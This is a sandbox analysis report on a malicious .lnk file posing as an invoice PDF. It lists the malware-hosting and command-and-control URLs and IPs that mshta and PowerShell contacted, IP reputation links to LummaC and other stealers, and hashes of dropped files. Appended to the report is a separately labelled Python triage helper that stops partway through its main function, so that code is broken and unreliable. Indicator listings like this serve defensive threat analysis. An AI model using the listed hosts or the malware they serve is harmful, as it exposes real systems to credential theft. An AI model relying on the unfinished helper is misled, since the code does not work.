                                                                                                                                                                                      https://dimitricostruzioni.ch/dimitri/TCUINOVJpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://dimitricostruzioni.ch/dimitri/TCUINOVpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://securesways.click:443/apiexplorer.exe, 00000015.00000003.2632949061.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2633160316.00000000030B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://dimitricostruzioni.ch/documentcomplie...wmshta.exe, 00000005.00000003.2666686122.000001C3937ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667263029.000001C3937F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682370166.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667620476.000001C3937F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://www.catcert.cat/verCIT-10iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://dimitricostruzioni.ch/dimitpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://x1.c.lencr.org/0explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://x1.i.lencr.org/0explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://dimitricostruzioni.ch/documentcomplieajmshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://contoso.com/powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://dimitricostruzioni.ch/documentcompliehttps://dimitricostruzioni.ch/documentcompliemshta.exe, 00000005.00000003.2673692306.000001C399325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://dimitricostruzioni.ch/dimitri/TCUIpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://dimitricostruzioni.ch/dimitri/powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allexplorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://bugreports.qt-project.org/TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://stats.itopupdate.com/multi_app_new.phpTCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.10.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://securesways.click/1explorer.exe, 00000015.00000003.2817683193.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2780823984.000000000311D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://securesways.click/explorer.exe, 00000015.00000003.2767821799.0000000003120000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://crl3.digiceriScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://dimitricostruzioni.ch/mshta.exe, 00000005.00000003.2665496381.000001BB90B79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                      unknown
Legend (share of IPs):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.16.1 | securesways.click | United States | | 13335 | CLOUDFLARENETUS | true
62.182.21.105 | dimitricostruzioni.ch | United Kingdom | | 200083 | SUB6GB | true

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579308
Start date and time: 2024-12-21 14:58:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Rechnung736258.pdf.lnk
Detection: MAL
Classification: mal100.troj.spyw.evad.winLNK@36/74@5/3
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 43
• Number of non-executed functions: 58
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 92.122.16.236, 23.218.208.137, 172.64.41.3, 162.159.61.3, 199.232.214.172, 18.213.11.84, 54.224.241.105, 34.237.241.83, 50.16.47.176, 23.195.39.65, 2.20.40.170, 2.19.126.149, 2.19.126.143, 172.202.163.200, 13.107.246.63, 3.219.243.226
• Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
• Execution Graph export aborted for target explorer.exe, PID 940 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 5832 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
| --- | --- | --- |
| 08:58:57 | API Interceptor | 1x Sleep call for process: WMIC.exe modified |
| 08:59:03 | API Interceptor | 2x Sleep call for process: svchost.exe modified |
| 08:59:03 | API Interceptor | 1x Sleep call for process: mshta.exe modified |
| 08:59:04 | API Interceptor | 50x Sleep call for process: powershell.exe modified |
| 08:59:21 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified |
| 08:59:56 | API Interceptor | 8x Sleep call for process: explorer.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| 104.21.16.1 | JNKHlxGvw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php |
| 62.182.21.105 | KlarnaInvoice229837.pdf.lnk | malicious | LummaC | |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| bg.microsoft.map.fastly.net | Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 199.232.210.172 |
| bg.microsoft.map.fastly.net | HX Design.exe | malicious | Python Stealer, Blank Grabber | 199.232.210.172 |
| bg.microsoft.map.fastly.net | 1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exe | malicious | AsyncRAT, DcRat | 199.232.210.172 |
| bg.microsoft.map.fastly.net | 1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exe | malicious | PureLog Stealer, zgRAT | 199.232.214.172 |
| bg.microsoft.map.fastly.net | Statements.pdf | malicious | WinSearchAbuse | 199.232.210.172 |
| bg.microsoft.map.fastly.net | INVOICE_2279_from_RealEyes Digital LLC (1).pdf | malicious | Unknown | 199.232.214.172 |
| bg.microsoft.map.fastly.net | Z8oTIWCyDE.exe | malicious | LummaC | 199.232.210.172 |
| bg.microsoft.map.fastly.net | BB4S2ErvqK.exe | malicious | LummaC | 199.232.214.172 |
| bg.microsoft.map.fastly.net | MS100384UTC.xls | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | SWIFT.xls | malicious | Unknown | 199.232.214.172 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| CLOUDFLARENETUS | https://shibe-rium.net/ | malicious | Unknown | 104.18.18.237 |
| CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.197.170 |
| CLOUDFLARENETUS | finathot.exe | malicious | RHADAMANTHYS | 172.67.178.25 |
| CLOUDFLARENETUS | Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 172.67.197.170 |
| CLOUDFLARENETUS | BigProject.exe | malicious | LummaC | 172.67.197.170 |
| CLOUDFLARENETUS | setup.msi | malicious | Unknown | 172.67.164.25 |
| CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 104.21.18.185 |
| CLOUDFLARENETUS | Full-Setup.exe | malicious | LummaC | 104.21.43.127 |
| CLOUDFLARENETUS | jqplot.hta | malicious | Unknown | 104.21.90.205 |
| CLOUDFLARENETUS | setup.exe | malicious | LummaC | 104.21.84.113 |
| SUB6GB | KlarnaInvoice229837.pdf.lnk | malicious | LummaC | 62.182.21.105 |
| SUB6GB | Wk8eTHnajw.elf | malicious | Unknown | 62.182.21.92 |
| SUB6GB | http://cmax.co.uk/bv.PDF | malicious | Unknown | 62.182.22.52 |
| SUB6GB | https://cmax.co.uk/bv.PDF | malicious | Unknown | 62.182.22.52 |
| SUB6GB | https://cmax.co.uk/qw.PDF | malicious | Unknown | 62.182.22.52 |
| SUB6GB | WSGZf4NplR.elf | malicious | Mirai | 62.182.18.128 |
| SUB6GB | Transitdokumente.zip | malicious | Unknown | 62.182.20.50 |
| SUB6GB | Transitdokumente.zip | malicious | Unknown | 62.182.20.50 |
| SUB6GB | KTi123tZU6 | malicious | Unknown | 62.182.18.121 |
| SUB6GB | s422uUu30Y | malicious | Mirai | 185.41.12.55 |
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        2BI8rJKpBa.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Full-Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        Oggq2dY6kx.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exede7s.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          ofsetvideofre.click.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            NPKpnpi8wd.exeGet hashmaliciousUnknownBrowse

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.8307103015499986
Encrypted: false
SSDEEP: 1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugc:gJjJGtpTq2yv1AuNZRY3diu8iBVqFm
MD5: AFCFD726B78897ACD9B959A309F3B751
SHA1: E69B37106E4E5F6A011009CF04940D40BA3933A1
SHA-256: 0463A93993D7C3CF0626390873CFCD37EBE079979DF15467C803974A09A2D637
SHA-512: CC38347AE3C88AB150B917A188AA635AA5B0251FDB9727AC1DDF41E0EEE10FBB296FD5ACCD9D0812B534B25EFA468C08BF36B907F0A8D11F4789F428D90A9218
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xb97b0ed3, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.6586092532711962
Encrypted: false
SSDEEP: 1536:DvdSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/T:Dvdaza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5: C0836BE5CC4BCA031BEA61A8CA732AB7
SHA1: B24E33DADC6C9DFB8AC66DE76D118C5696C31A65
SHA-256: 7D80C02FFDAB265391625B5734EEF813AD8E9310E4D1618E6C29212E2A44A518
SHA-512: B9B2FC7B4FD8A794F60AB3A404F763E180CFCCD47AF42959379C70822369C2DDCB0F23A58C71AA17F338373A7F23F66ECA182788DF93C52D28F73FC08160FBC2
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07886351023241178
Encrypted: false
SSDEEP: 3:TlEYeRxb1GkGuAJkhvekl1UpbZy/tallrekGltll/SPj:2zRJHrxlqpMIJe3l
MD5: DF1D17759EE30601F49BF05143A9ED95
SHA1: 33AC197A48274EA91B15F6CA42ACF813CBAFE59C
SHA-256: E2F36EE771F7E48AD478634346C050ED1B87C006D4FDAF74851A904D4390EFB2
SHA-512: C64DC7639BFC3F7DECE0C9A228BFAC6DF48A9EB81D2AA3286D5ECE6E08110BDE8A12D45288C6B5C537392B3A4CB724CF6B2D194F76491E058140FEC246C4F959
Malicious: false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:ASCII text
Category:dropped
Size (bytes):294
Entropy (8bit):5.168078105879882
Encrypted:false
SSDEEP:6:wJiqeIq2P92nKuAl9OmbnIFUt8XJi+5Zmw+XJi+TkwO92nKuAl9OmbjLJ:wfeIv4HAahFUt8Xj5/+XjT5LHAaSJ
MD5:FE5545087F19A313022F4E76544D5DA8
SHA1:16ADD50C70F9C31941799123FDCA5E3792EB1A7E
SHA-256:86F7355CA99022C7E3AC5C729C3F37FE013277185A1333A9C8D621352D269B2B
SHA-512:B1E99A04CDD7009BE9B65A2CF6105A480EDEE49A1F6DA167D7197BBCFB40131F697F491E9171090A5C9172A87BED86794A1197C97E999ED92D192690CCEF46D3
Malicious:false
Preview:2024/12/21-08:59:10.519 1ca4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/21-08:59:10.521 1ca4 Recovering log #3.2024/12/21-08:59:10.521 1ca4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:ASCII text
Category:dropped
Size (bytes):338
Entropy (8bit):5.198458215989833
Encrypted:false
SSDEEP:6:wJi7QL+q2P92nKuAl9Ombzo2jMGIFUt8XJieQG1Zmw+XJieQQLVkwO92nKuAl9OU:w7yv4HAa8uFUt8X75/+X7FR5LHAa8RJ
MD5:1DA05BB9973030BF78A6E3144EADAB49
SHA1:36FF6B6D70811698E3B03BCA109A2AC124A2B6E7
SHA-256:649A5351DBFB8002D8D0A5880BD9E024C7349CA97012F7E63BE4F8DFBF84D10E
SHA-512:4286C22AD10D69277EBCA09F192CE0DFB92111361EB9417D7C02965E5F1C39FF64F8C223556C7FDDD541123B8CC6923B24BBD7C816FD727525406037AEF292D3
Malicious:false
Preview:2024/12/21-08:59:10.566 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/21-08:59:10.568 1d18 Recovering log #3.2024/12/21-08:59:10.568 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:JSON data
Category:dropped
Size (bytes):508
Entropy (8bit):5.047195090775108
Encrypted:false
SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:70321A46A77A3C2465E2F031754B3E06
SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:false
Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:JSON data
Category:modified
Size (bytes):508
Entropy (8bit):5.051804225401675
Encrypted:false
SSDEEP:12:YH/um3RA8sqisBdOg2Hzgcaq3QYiubxnP7E4TfF+:Y2sRdsadMHzL3QYhbxP7np+
MD5:DDB498FAE0B971C07E8B8094456C4FE7
SHA1:47648A34730F42DFC7E484DE4C45C58D09F3933F
SHA-256:49DB18BC7EB7F4D8AC2288EB893E42EEACCCDEABE999BF7F45AD3AD80649F118
SHA-512:43CA9A032B092627321AB059A731F1548C7B271445618A5E2B11ED5C6E5F9041E64FB8B106754C47395E1F636EFD43625799B35A436CBFF6ACC44C99A6CE14C9
Malicious:false
Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379349559244475","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":629227},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
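Added example, not part of the Joe Sandbox report: a small triage helper for dropped-file records in the key:value layout used above. The report lists one record per written path, so the same bytes can appear more than once; the helper collapses records on SHA-256, recomputes the 8-bit Shannon entropy (bits per byte, 0 to 8) that the "Entropy (8bit)" field is assumed to report, and returns the hashes worth blocking or hunting (flagged Malicious by the sandbox, or a high-entropy PE, which usually means packed or encrypted). The sample input is constructed: the first record is hypothetical, with all-zero placeholder hashes, so that the filter has a hit; the remaining two are the AcroCEF leveldb LOG record from this listing, repeated once to exercise the dedupe step.

```python
"""Triage helper for Joe Sandbox "Dropped Files" records (added example)."""
import math
from collections import Counter
from typing import Dict, List

# Constructed sample input in the report's own key:value layout.
# Record 1 is hypothetical (placeholder hashes, size and entropy) so the
# filter has something to flag; records 2 and 3 are the benign AcroCEF
# leveldb LOG entry from the listing, repeated to show deduplication.
SAMPLE_RECORDS = """\
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1048576
Entropy (8bit):7.91
Encrypted:false
MD5:00000000000000000000000000000000
SHA1:0000000000000000000000000000000000000000
SHA-256:0000000000000000000000000000000000000000000000000000000000000000
Malicious:true
Process:C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\acrocef_1\\AcroCEF.exe
File Type:ASCII text
Category:dropped
Size (bytes):294
Entropy (8bit):5.168078105879882
Encrypted:false
MD5:FE5545087F19A313022F4E76544D5DA8
SHA1:16ADD50C70F9C31941799123FDCA5E3792EB1A7E
SHA-256:86F7355CA99022C7E3AC5C729C3F37FE013277185A1333A9C8D621352D269B2B
Malicious:false
Process:C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\acrocef_1\\AcroCEF.exe
File Type:ASCII text
Category:dropped
Size (bytes):294
Entropy (8bit):5.168078105879882
Encrypted:false
MD5:FE5545087F19A313022F4E76544D5DA8
SHA1:16ADD50C70F9C31941799123FDCA5E3792EB1A7E
SHA-256:86F7355CA99022C7E3AC5C729C3F37FE013277185A1333A9C8D621352D269B2B
Malicious:false
"""


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant file,
    8.0 for uniformly distributed bytes (assumed to match "Entropy (8bit)")."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split the flat listing into one dict per file.
    A new record starts at every 'Process:' line, as in the report."""
    records: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value.strip()
    return records


def dedupe_by_sha256(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Keep the first record seen for each SHA-256 (same bytes, many paths)."""
    seen: Dict[str, Dict[str, str]] = {}
    for rec in records:
        digest = rec.get("SHA-256")
        if digest and digest not in seen:
            seen[digest] = rec
    return list(seen.values())


def triage(records: List[Dict[str, str]], entropy_threshold: float = 7.0) -> List[str]:
    """Return SHA-256 values to block/hunt: sandbox-flagged Malicious, or a
    PE whose entropy is at or above the threshold (likely packed/encrypted)."""
    flagged: List[str] = []
    for rec in dedupe_by_sha256(records):
        malicious = rec.get("Malicious", "").lower() == "true"
        try:
            entropy = float(rec.get("Entropy (8bit)", "0"))
        except ValueError:
            entropy = 0.0
        is_pe = rec.get("File Type", "").startswith("PE32")
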